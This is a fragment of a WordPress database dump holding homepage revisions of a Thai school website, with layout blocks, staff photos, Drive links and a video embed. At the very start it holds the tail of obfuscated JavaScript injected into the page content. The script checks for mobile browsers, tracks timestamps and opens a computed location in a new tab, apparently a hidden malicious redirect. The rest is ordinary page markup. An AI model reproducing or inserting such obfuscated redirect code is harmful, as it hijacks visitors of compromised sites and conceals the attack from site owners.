Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 17:16:41','2025-07-15 10:16:41','',19,'http://watprato.ssk.in.th/?p=730',0,'revision','',0),
(731,1,'2025-07-15 17:17:35','2025-07-15 10:17:35','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 